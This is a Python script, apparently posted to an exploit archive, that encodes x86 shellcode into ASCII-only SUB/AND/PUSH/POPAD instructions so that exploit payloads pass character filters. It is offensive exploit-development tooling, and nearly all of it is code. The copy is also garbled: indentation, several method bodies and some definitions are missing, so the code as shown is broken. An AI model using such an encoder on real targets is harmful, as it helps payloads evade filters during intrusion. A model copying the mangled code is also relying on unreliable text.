#!/usr/bin/env python3
# Encoder Title: ASCII shellcode encoder via AND, SUB, PUSH, POPAD
# Date: 26.6.2019
# Encoder Author: Petr Javorik, www.mmquant.net
# Tested on: Linux ubuntu 3.13.0-32-generic, x86
# Special thx to: Corelanc0d3r for intro to this technique
# Description:
# This encoder is based on egghunter found in https://www.exploit-db.com/exploits/5342
# Core idea is that every dword can be derived using 3 SUB instructions
# with operands consisting strictly of ASCII compatible bytes.
# What it does?:
# Suppose that we want to push \x05\xEB\xD1\x8B (0x8BD1EB05) to the stack.
# Then we can do it as follows:
# AND EAX, 3F465456
# AND EAX, 40392B29 ; Two AND instructions zero EAX
# SUB EAX, 3E716230 ; Subtracting 3 dwords consisting
# SUB EAX, 5D455523 ; of ASCII compatible bytes from 0x00000000
# SUB EAX, 5E5D7722 ; we get EAX = 0x8BD1EB05
# Mandatory bytes:
# \x25 AND EAX, imm32
# \x2d SUB EAX, imm32
# \x50 PUSH EAX
# \x61 POPAD
# How to use:
# Edit the SETTINGS section and simply run as
# ./ASCIIencoder
# ProTip:
# Take special attention to the memory between the end of decoder instructions
# and the beginning of decoded shellcode. Program flow must seamlessly step over
# this memory. If this "bridge memory area" contains illegal opcodes they can
# be rewritten with additional PUSH instruction appended to the end of generated
# shellcode. Use for example PUSH 0x41414141.
import itertools
import struct
import random
import sys
assert sys.version_info >= (3, 6)
# CONSTANTS - no changes needed here
# ASCII character set
L_CASE = bytearray(range(0x61, 0x7b)) # abcdefghijklmnopqrstuvwxyz
U_CASE = bytearray(range(0x41, 0x5b)) # ABCDEFGHIJKLMNOPQRSTUVWXYZ
NUMBERS = bytearray(range(0x30, 0x3a)) # 0123456789
SPECIAL_CHARS = bytearray(
range(0x21, 0x30), # !"#$%&\'()*+,-.
range(0x3a, 0x41), # :;<=>?
range(0x5b, 0x61), # [\\]^_
range(0x7b, 0x7f) # {|}
ASCII_NOPS = b'\x41\x42\x43\x44' # and many more
# SETTINGS - enter shellcode, select character set and bad chars
input_shellcode = (
# input_charset = U_CASE + L_CASE
input_charset = ALL_CHARS
# badchars = b''
badchars = b''
# CORE - no changes needed here
class ASCII_Encoder(object):
def __init__(self, shellcode_, charset_, badchars_, nops_):
# Constructor args
self.shellcode = bytearray(shellcode_)
self.charset = charset_
self.badchars = badchars_
self.nops = nops_
# Private vars
self.encoded_dwords = []
self.twos_comps = []
self.sub_operands = []
self.payload = bytearray()
def encode(self):
def align_to_dwords(self):
# Input shellcode alignment to dword multiples
nop = b'\x90'
pad_count = 4 - (len(self.shellcode) % 4)
if 0 < pad_count < 4:
self.shellcode += nop * pad_count
def remove_badchars(self):
for badchar in self.badchars:
self.charset = self.charset.replace(bytes([badchar]), b'')
self.nops = self.nops.replace(bytes([badchar]), b'')
def derive_dwords_sub(self):
def get_sub_encoding_bytes(target):
target x y z
0x100 - (0x21+0x21) = 0xbe
We need to select x, y, z such that it gives target when summed and all of
x, y, z is ASCII and non-badchar
# Get all possible solutions
all_xy = list(itertools.combinations_with_replacement(self.charset, 2))
results = []
for x, y in all_xy:
z = target - (x + y)
# Get only bytes which are ASCII and non-badchar
if (0 < z < 256) and (z in self.charset):
'x': x,
'y': y,
'z': z,
'of': True if target >= 0x100 else False
# Choose random solution
return random.choice(results)
for dword in struct.iter_unpack('<L', self.shellcode):
# 32-bit 2's complement
twos_comp = (dword[0] ^ 0xffffffff) + 1
encoded_block = []
for byte_ in struct.pack('>L', twos_comp):
# Will overflow be used when calculating this byte using 3 SUB instructions?
if byte_ / 3 < min(self.charset):
byte_ += 0x100
def compensate_overflow(self):
# If neighbor lower byte overflow then subtract 1 from max(x, y, z)
for dword in self.encoded_dwords:
for solution, next_solution in zip(dword, dword[1:]):
if next_solution['of']:
max_value_key = max(solution, key=solution.get)
solution[max_value_key] -= 1
def derived_dwords_to_sub_operands(self):
for dword in self.encoded_dwords:
sub_operand_0 = struct.pack('<BBBB',
*[solution['x'] for solution in dword])
sub_operand_1 = struct.pack('<BBBB',
*[solution['y'] for solution in dword])
sub_operand_2 = struct.pack('<BBBB',
*[solution['z'] for solution in dword])
def twos_comp_check(self):
# Check if calculated dwords for SUB instruction give 2's complement if they are summed
for twos_comp, sub_operand in zip(self.twos_comps, self.sub_operands):
sup_operand_sum = sum(
[int.from_bytes(dw, byteorder='big') for dw in sub_operand])
# Correction of sum if there is overflow on the highest byte
if sup_operand_sum > 0xffffffff:
sup_operand_sum -= 0x100000000
assert (twos_comp == sup_operand_sum)
def compile_payload(self):
def derive_bytes_and():
all_xy = list(itertools.combinations_with_replacement(self.charset, 2))
results = []
for x, y in all_xy:
if x + y == 127:
results.append((x, y))
while 1:
yield random.choice(results)
def derive_dwords_and():
gen_bytes = derive_bytes_and()
bytes_ = []
for _ in range(0, 4):
return bytes_
# POPAD n times to adjust ESP.
# Decoded shellcode must be written after the decoder stub
self.payload += b'\x61' * (len(self.encoded_dwords))
for sub_operand in reversed(self.sub_operands):
# Clearing EAX instructions with AND instructions
bytes_ = derive_dwords_and()
self.payload += b'\x25' + struct.pack('<BBBB',
*[byte_[0] for byte_ in bytes_])
self.payload += b'\x25' + struct.pack('<BBBB',
*[byte_[1] for byte_ in bytes_])
# Encoded shellcode with SUB instructions
self.payload += b'\x2d' + sub_operand[0][::-1]
self.payload += b'\x2d' + sub_operand[1][::-1]
self.payload += b'\x2d' + sub_operand[2][::-1]
# Push EAX
self.payload += b'\x50'
# Pad with NOPs
self.payload += bytes(random.choices(self.nops, k=9))
def print_payload(self):
print('Original payload length: {}'.format(len(input_shellcode)))
print('Encoded payload length: {}'.format(len(self.payload)))
print('hex: ',
'\\x' + '\\x'.join('{:02x}'.format(byte) for byte in self.payload))
if __name__ == '__main__':
encoder = ASCII_Encoder(input_shellcode, input_charset, badchars, nops)